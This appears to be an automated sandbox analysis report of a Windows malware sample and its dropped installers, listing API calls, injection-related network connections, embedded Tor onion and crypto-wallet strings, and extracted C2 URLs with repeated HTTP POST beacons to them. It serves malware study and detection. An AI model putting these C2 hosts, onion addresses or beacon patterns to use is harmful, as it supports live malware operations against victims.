Source:	Binary string: dbghelp.pdbGCTL source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Code function: 2_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Code function: 2_2_00402910 FindFirstFileW,	2_2_00402910
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Code function: 2_2_004068B4 FindFirstFileW,FindClose,	2_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429C40 CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,	3_2_00429C40
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429870 WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,	3_2_00429870
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429A5C WriteConsoleInputW,WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,	3_2_00429A5C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429A30 DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,WriteConsoleInputW,WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,	3_2_00429A30
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429AB9 WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,	3_2_00429AB9
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_0042A378 InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,	3_2_0042A378

Source: C:\Windows\System32\conhost.exe

Code function: 4x nop then push rbx

60_2_00007FF6EB43DB93

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 95.214.26.28 80
Source: C:\Windows\explorer.exe	Network Connect: 172.67.34.170 443
Source: C:\Windows\explorer.exe	Network Connect: 51.15.58.224 14433

Found Tor onion address

Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttps://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionSELECT displayName FROM AntiVirusProductW. Europe Standard Time
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C11A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: S-1-5-21-2246122658-3693405117-2476756634-1003https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2246122658-3693405117-2476756634-1003
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ?-&52$1631313626321023042b113f2d26353224http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7SELECT Name FROM Win32_VideoControllerS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7c:\users\user\appdata\local\temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe" C:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshTrustedInstallerSeDebugPrivilege
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://host-file-host6.com/
Source: Malware configuration extractor	URLs: http://host-host-file8.com/

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ocyugmcp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tmugk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rpfwsaim.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kegnkcpidq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bxqfgpms.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jgdfwhycbb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dqxfcxtqc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sxcdcfkj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jlmfcqwlhw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pwlgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://euufg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kxuoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vebudrviog.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wrrdwyfsj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://criwvjvtwq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jwddotbdq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xmobe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://swunoda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jyicmpi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jbdwgxah.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hpfeeptar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ydikox.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qcunmavvat.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kibrkvnbk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rihjsppp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mogop.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-host-file8.com
